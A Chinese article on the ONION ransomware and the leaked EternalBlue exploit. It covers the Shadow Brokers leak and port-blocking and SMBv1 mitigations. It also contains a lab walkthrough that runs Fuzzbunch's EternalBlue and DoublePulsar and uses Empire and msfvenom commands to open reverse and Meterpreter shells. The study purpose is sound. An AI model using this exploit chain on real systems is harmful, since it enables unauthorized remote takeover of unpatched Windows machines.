開篇語

近期國內(nèi)多所院校出現(xiàn)ONION勒索軟件感染情況，磁盤文件會被病毒加密為.onion后綴，加密使用了高強(qiáng)度的加密算法難以破解，只有支付高額贖金才能解密恢復(fù)文件，對學(xué)習(xí)資料和個人數(shù)據(jù)造成嚴(yán)重?fù)p失。
根據(jù)網(wǎng)絡(luò)安全機(jī)構(gòu)通報，這是不法分子利用NSA黑客武器庫泄漏的“永恒之藍(lán)”發(fā)起的病毒攻擊事件?！坝篮阒{(lán)”會掃描開放445文件共享端口的Windows機(jī)器，無需用戶任何操作，只要開機(jī)上網(wǎng)，不法分子就能在電腦和服務(wù)器中植入勒索軟件、遠(yuǎn)程控制木馬、虛擬貨幣挖礦機(jī)等惡意程序。

下面我們來探索下這個病毒及其兄弟家族的起源

正文

一、病毒起源

早在去年8月份的時候黑客組織 Shadow Brokers就聲稱攻破了給NSA開發(fā)網(wǎng)絡(luò)武器的美國黑客團(tuán)隊方程式組織（Equation Group），并公開拍賣據(jù)稱是美國政府使用的黑客工具。為了證明自己，Shadow Brokers還貼出了部分文件在網(wǎng)上，然后要求以100萬比特幣（現(xiàn)價約超過5億美元）的價格進(jìn)行拍賣，拍賣事件由于信息的撲朔迷離未能成功，但當(dāng)時對幾家全球路由器制造商確實造成了影響。
　　換句話說，美國國家安全局用以入侵網(wǎng)絡(luò)的黑客武器，被另一黑客組織偷到手了！偷到手也就算了，還把「永恒之藍(lán)」等一系列的黑客武器上傳到網(wǎng)絡(luò)開源化，提供給全球網(wǎng)友下載。一夜之間，沒有殺毒軟件或者軟件過期的微軟系統(tǒng)全部暴露在危險之中。
　　Shadow Brokers泄露了大量美國NSA的文件，其中深度披露了方程式組織的黑客攻擊方法。當(dāng)時在 Medium 上的一篇長博文中，Shadow Brokers 分享了一個可以打開所有加密文件夾的密碼，披露理由是不滿“政府軍對平民使用了化學(xué)武器”，疑似指代美國政府早些時候?qū)⒗麃喛哲娀匕l(fā)動的導(dǎo)彈襲擊。根據(jù) Twitter 上的爆料，這批漏洞主要針對Linux，似乎包含了 EQGRP 這套 Linux 工具。

推特詳情

以下是經(jīng)過MSRC確認(rèn)，已在更新中被解決的漏洞列表，建議大家及時更新電腦到最新版本。
　　

大家盡可能的把這些漏洞補上，以防后面可能發(fā)生的意外

二、解決措施

一、為計算機(jī)安裝最新的安全補丁，微軟已發(fā)布補丁MS17-010修復(fù)了“永恒之藍(lán)”攻擊的系統(tǒng)漏洞，請盡快為電腦安裝此補丁，網(wǎng)址為
https://technet.microsoft.com/zh-cn/library/security/MS17-010；
二、對于windows XP和windows server 2003等微軟已不再提供安全更新的機(jī)器，建議用戶盡快升級到window 7/windows 10
Windows 10 Language Pack (x64) - DVD (Multiple Languages)
mu_windows_10_language_pack_x64_dvd_6846438.iso SHA1 8FFC07D8C6069746C8222DD6F65BAD2F779F735C
1.28GB 2015-07-29
ed2k://|file|mu_windows_10_language_pack_x64_dvd_6846438.iso|1370247168|ED038183115D03F8627F22593425F246|/
或windows server 2008/2012/2016操作系統(tǒng)。升級前推薦使用360“NSA武器庫免疫工具”檢測系統(tǒng)是否存在漏洞，并關(guān)閉受到漏洞影響的端口，可以避免遭到勒索軟件等病毒的侵害。免疫工具下載地址
http://dl.360safe.com/nsa/nsatool.exe

三、關(guān)閉445、135、137、138、139端口，關(guān)閉網(wǎng)絡(luò)共享。具體操作如下：
1、在開始之前，請立刻將你的電腦斷網(wǎng)！??！
2、Win+R打開運行，輸入gpedit.msc進(jìn)入組策略編輯器。

組策略編輯器，如果打不開，參見下列鏈接：[Win10無法打開此計算機(jī)上的組策略對象怎么辦](https://jingyan.baidu.com/article/e6c8503c6e78a6e54f1a18fb.html)

3、在左側(cè)邊欄中，依次選取 “Windows 設(shè)置 - 安全設(shè)置 - IP安全策略，在本地計算機(jī)“

進(jìn)入計算機(jī)設(shè)置-Windows設(shè)置

進(jìn)入安全設(shè)置

進(jìn)入IP安全策略設(shè)置

4、接下來右鍵單擊 “IP安全策略，在本地計算機(jī)”，并選擇“創(chuàng)建IP安全策略”

接下來右鍵單擊 “IP安全策略，在本地計算機(jī)”，并選擇“創(chuàng)建IP安全策略”

5、在跳出的“IP安全策略向?qū)А爸杏益I

6、在第二步的名稱中輸入“封禁端口”然后一路“下一步”

7、單擊“完成”

8、在隨后跳出的封禁端口屬性窗口中，單擊添加。

9、需要注意的是不要勾選右下角的“使用添加向?qū)А?/strong>

10、在"新規(guī)則屬性"窗口中，單擊左下角的"添加"

11、在IP篩選器列表窗口中，單擊右側(cè)的添加按鈕，需要注意的是這里也不要點擊右下角的"使用添加向?qū)?

12、在彈出的IP篩選器屬性窗口的地址選項卡中，原地址選擇“任何IP地址”，目標(biāo)地址選擇“我的IP地址”

13、然后選擇協(xié)議選項卡，選擇協(xié)議類型為：TCP，設(shè)置IP協(xié)議端口為"從任意端口""到此端口"：445，并單擊確定。

14、在IP篩選器列表中單擊確定。

15、然后在新規(guī)則屬性中，單擊篩選器操作選項卡

16、單擊下方的添加，并且不要勾選右側(cè)的使用添加向?qū)А?/p>

17、在新篩選器操作屬性中，選擇“阻止”，并切換到常規(guī)選項卡，將名稱改為阻止。

18、單擊確定，回到新規(guī)則屬性窗口中的篩選器操作，勾選剛才建立的“阻止”，在切換到IP篩選器列表，勾選剛才建立的“445”。然后單擊應(yīng)用，再單擊關(guān)閉

19、單擊“確定”

20、回到組策略編輯器，右鍵單擊右側(cè)剛才創(chuàng)建的“封禁端口”，在右鍵菜單當(dāng)中選擇分配，就成功關(guān)閉了445端口。

21、大家還需要關(guān)閉135、137、138、139端口，操作與上述關(guān)閉445的操作相同。

攻擊復(fù)現(xiàn)

配置Fuzzbunch并創(chuàng)建基本利用環(huán)境

為了達(dá)到更好的實驗效果，我們將需要配備以下系統(tǒng)環(huán)境：
Windows 7 64-bit 作為被攻擊目標(biāo)。IP：10.11.1.253
Windows 7 作為Windows攻擊機(jī)，并運行Fuzzbunch。IP： 10.11.1.251
Kali Linux 作為另一臺攻擊機(jī)，并運行Empire framework。IP： 10.11.1.16

在我們正式開始實驗之前，我們還需要在Windows 和Kali Linux攻擊機(jī)上進(jìn)行一些相應(yīng)的環(huán)境部署。

Windows 7相關(guān)環(huán)境的安裝配置

在Windows 7攻擊機(jī)上，我們需要安裝Python 2.6和PyWin32 v212。安裝文件可以在這里下載：
Python 2.6: https://www.python.org/download/releases/2.6/
PyWin32 v212: https://sourceforge.net/projects/pywin32/files/pywin32/Build%20212/
按照基本安裝步驟首先安裝Python，然后再安裝PyWin32。這里需要注意的是，安裝PyWin32務(wù)必以管理員身份進(jìn)行，否則可能會出現(xiàn)報錯。如果你需要再次運行安裝后的腳本，則可以在以下目錄中找到：
C: \Python26\Scripts

在Kali Linux上安裝Empire Framework

在Kali Linux上，我們需要安裝可從Github獲取的Empire框架：
Empire framework: https://github.com/EmpireProject/Empire
在Kali Linux上安裝Empire Framework非常簡單，只需運行./setup/install.sh腳本即可一鍵安裝，然后運行./empire就可以啟動Empire。

1-Empire-framework.jpg

配置Fuzzbunch

接下來，我們就可以到Github上下載Shadow Brokers泄露的NSA工具并將其解壓到桌面。這里需要注意的是，當(dāng)你從Github下載轉(zhuǎn)儲時，你必須要在包含fb.py（Fuzzbunch）文件的Windows目錄中，創(chuàng)建一個名為“l(fā)isteningspost”的新文件夾。

2-Fuzzbunch-listeningposts-error.jpg

最后編輯名為fuzz bund.xml的Fuzzy Bunch配置文件，并設(shè)置相應(yīng)的ResourcesDir和LogDir參數(shù)：

3-Fuzzbunch-settings.jpg

現(xiàn)在我們就可以通過命令行來執(zhí)行fb.py文件，啟動Fuzzbunch。至此應(yīng)該沒有任何報錯：

4-Starting-Fuzzbunch.jpg

如果你看到了關(guān)于缺少DLL或?qū)氲腻e誤提示，請確保是否已正確安裝了PyWin32，并且安裝后腳本是否成功完成。
配置和執(zhí)行Eternalblue
至此，我們已經(jīng)具備了Eternalblue漏洞利用的所有條件。執(zhí)行Eternalblue需要一個目標(biāo)IP和回調(diào)IP地址。這里的目標(biāo)地址則為10.11.1.253（Windows 7 64-bit），而反彈地址則為 10.11.1.251（Windows 7）。

5-Fuzzbunch-target.jpg

接下來需要我們配置和指定是否重定向，和日志記錄相關(guān)的一些參數(shù)，并在Fuzzbunch中創(chuàng)建一個新的項目。我們不會使用重定向，因此輸入“no”，然后按Enter鍵繼續(xù)。繼續(xù)按回車鍵保持默認(rèn)選項。然后我們選擇選項4（或沒有現(xiàn)有項目時為0）創(chuàng)建一個新項目，并將其命名為任何你喜歡的項目名稱，并選擇為你的新項目使用默認(rèn)的日志記錄位置。

6-Fuzzbunch-projects.jpg

要查看全部加載的插件/exploit類型，可以使用’use’命令。選擇使用Eternalblue插件，請鍵入以下命令：
use Eternalblue

7-Fuzzbunch-Eternalblue-Plugin.jpg

接著Fuzzbunch會詢問我們是否提示進(jìn)行變量設(shè)置，我們選擇yes。傳輸方式我們選擇1‘FB’。

8-Eternalblue-delivery-mechanism.jpg

最后會詢問我們，是否要執(zhí)行插件：

9-Eternalblue-settings.jpg

如果一切順利，F(xiàn)uzzbunch將輸出Eternalblue成功的提示：

10-Executing-Eternalblue-exploit-.jpg

配置Empire 偵聽和反向DLL shell
首先，我們在Empire中設(shè)置一個偵聽處理程序，并生成一個包含反向shell的惡意DLL文件。首先我們使用Empire命令創(chuàng)建一個監(jiān)聽器：
listeners set Name Eternalblue set Host http://10.11.1.16 set Port 4444 execute

輸入完成后，你可以使用list命令來檢查配置內(nèi)容是否正確：

11-Empire-listener-settings.jpg

接著，我們使用以下命令來創(chuàng)建一個包含反向shell的惡意DLL文件：
usestager dll Eternalblue set Arch x64 set OutFile /var/www/html/launcher.dll execute

12-Empire-framework-stager-dll.jpg

DLL文件現(xiàn)在存儲在Web根目錄下。要將DLL傳輸?shù)搅硪慌_Windows 7攻擊機(jī)上，只需使用以下命令啟動Apache Webserver即可：
service apache2 start

現(xiàn)在我們就可以使用瀏覽器，從Windows 7攻擊機(jī)上下載DLL文件了。我們將launcher.dll文件存儲在Windows文件夾中。
Msfvenom惡意DLL文件的創(chuàng)建
除此之外，你還可以使用msfvenom來生成惡意DLL文件，并使用多處理程序設(shè)置監(jiān)聽：
msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 –platform windows -f dll LHOST=192.168.1.16 LPORT=4444 > /var/www/html/launcher.dll

以上命令將使用msfvenom，生成一個Meterpreter的有效載荷：

Eternalblue-exploit-with-Meterpreter-payload.jpg

DoublePulsar
下一步是運行DoublePulsar并注入惡意的launcher.dll文件。在Fuzzbunch中鍵入以下命令以使用DoublePulsar：
use DoublePulsar

13-DoublePulsar.jpg

接著DoublePulsar會為我們顯示相關(guān)的目標(biāo)參數(shù)，如果你的攻擊目標(biāo)為不同的架構(gòu)，則需要選擇對應(yīng)的系統(tǒng)架構(gòu)（32或64bit）。其他變量我們只需保持默認(rèn)不變即可，直到功能選項出現(xiàn)。

14-DoublePulsar-settings.jpg

在接下來的功能選項中，我們選擇2注入并運行一個DLL文件（我們之前生成的惡意DLL文件）。

15-DoublePulsar-operation.jpg

然后我們需要輸入DLL文件的位置，以及其他一些選項我們默認(rèn)回車即可。

16-DoublePulsar-settings.jpg

選擇所有其他變量設(shè)置的默認(rèn)選項，直到Fuzzbunch詢問我們是否要執(zhí)行DoublePulsar：

17-Executing-DoublePulsar.png

如果一切順利，DoublePulsar將輸出DoublePulsar成功的提示：

18-DoublePulsar-executing.jpg

當(dāng)我們切換到運行Empire監(jiān)聽器的Kali Linux虛擬機(jī)時，我們應(yīng)該已經(jīng)獲取到了目標(biāo)機(jī)器的一個反向shell，但是我們無法與之進(jìn)行交互：

19-Empire-reverse-shell.jpg

將Empire shell切換為Meterpreter shell
讓我們來嘗試下，是否可以將Empire shell切換為Meterpreter shell。我們運行以下命令設(shè)置偵聽：
use exploit/multi/handler set payload windows/meterpreter/reverse_https set lhost 10.11.1.16 set lport 5555 run

20-Empire-shell-to-Metasploit.jpg

現(xiàn)在，讓我們再次切換回Empire并運行以下命令：
usemodule code_execution/invoke_shellcode set Lhost 10.11.1.16 set Lport 5555 execute

21-Empire-execute-reverse-shell.jpg

當(dāng)我們再次切換回Metasploit時，我們應(yīng)該已經(jīng)收到了一個Meterpreter shell：

Meterpreter-shell.jpg

修復(fù)建議
微軟已于2017年3月份就修補了Eternalblue漏洞。如果您尚未安裝補丁程序，建議您在短時間內(nèi)完成此操作。另一個有效的方法是在Windows機(jī)器上禁用SMBv1。
要在Windows 8和Windows Server 2012上禁用SMBv1，請打開Windows Powershell并運行以下命令以禁用SMBv1：
Set-SmbServerConfiguration -EnableSMB1Protocol $false

使用以下命令檢查SMBv1是否已被禁用：
Get-SmbServerConfiguration | Select EnableSMB1Protocol, EnableSMB2Protocol

Disable-SMBv1-on-Windows.jpg

在PowerShell中運行以下cmdlet，禁用Windows 7，Windows Server 2008 R2，Windows Vista和Windows Server 2008上的SMBv1協(xié)議：
Set-ItemProperty -Path “HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters” SMB1 -Type DWORD -Value 0 -Force

總結(jié)
在本教程中我們學(xué)會了，如何使用Eternalblue遠(yuǎn)程利用SMBv1協(xié)議中的漏洞。雖然Eternalblue相比MS08-067利用起來并不輕松，但其效果都是一樣的。同時，也希望通過這個例子讓大家意識到定期更新Windows系統(tǒng)的重要性，以及技術(shù)更新?lián)Q代的必要性。想要了解更多關(guān)于Eternalblue的內(nèi)容，你可以查看 CVE-2017-0143 以及微軟關(guān)于MS17-010的相關(guān)安全公告。

本文借鑒了諸多鏈接復(fù)合而成，下面是詳細(xì)鏈接出處，侵權(quán)立刪！
方程式0day ETERNALBLUE復(fù)現(xiàn)之Empire & Msfconsole下的shell獲取
 Onion病毒正在教育網(wǎng)內(nèi)肆虐，華中大微校園提醒大家防范危險病毒
 Shadow Brokers又爆NSA神級機(jī)密0day，i春秋一個箭步首發(fā)了在線實驗環(huán)境！

結(jié)束語

除了撥網(wǎng)線，想不到別的辦法。想想，這只人家泄露的一小部分呢。隱藏的大殺器不敢想像。
——錦行科技CTO Jannock

所有 Windows 服務(wù)器、個人電腦，包括 XP/2003/Win7/Win8，Win 10 最好也不要漏過，全部使用防火墻過濾/關(guān)閉 137、139、445端口；對于 3389 遠(yuǎn)程登錄，如果不想關(guān)閉的話，至少要關(guān)閉智能卡登錄功能。剩下的就是請穩(wěn)定好情緒，坐等微軟出補丁。

——長亭科技.Monster

關(guān)于 The Shadow Brokers 剛放出來的那個工具包，微軟發(fā)布公告指出其中所用的漏洞都已被修復(fù)。也就是說，如果你用 Windows 7、Windows 10 并且及時打補丁，就不用擔(dān)心。
　　另一方面，我也注意到，其中一些 2017 年 3 月修復(fù)的漏洞，攻擊工具的編譯時間是 2011 年。也就是說 CIA 在手里至少捏了 6 年。
——騰訊玄武實驗室.TK

這次暴露的NSA武器庫漏洞體現(xiàn)了交叉覆蓋的威力了，款款精品總有一款滿足你。03年我設(shè)計完成的“潛入者”滲透測試系統(tǒng)比這還覆蓋得多，當(dāng)時連續(xù)好多年基本上是現(xiàn)實中的window通殺，現(xiàn)實中用這套系統(tǒng)成功控制了很多安裝有防火墻的APT攻擊者自身工作電腦。端口涉及到135、139、445、80、42、1433、1025-1030等，漏洞有upnp、msg、webdav、asp、ras、wins、dns等等。關(guān)鍵一點，我已經(jīng)意識到對0day武器庫的管理很重要。這套系統(tǒng)，真正的是一個活的漏洞武器庫。
　　這次泄露，有可能是某個或者某些使用者個人機(jī)器或者肉雞的工作目錄被端，導(dǎo)致0day泄漏。其實“潛入者”就是針對NSA這種需求做的一套APT系統(tǒng)。03年的設(shè)計，理念到現(xiàn)在還是那么先進(jìn)。
——騰訊湛瀘實驗室.yuange

個人宣言

知識傳遞力量，技術(shù)無國界，文化改變生活！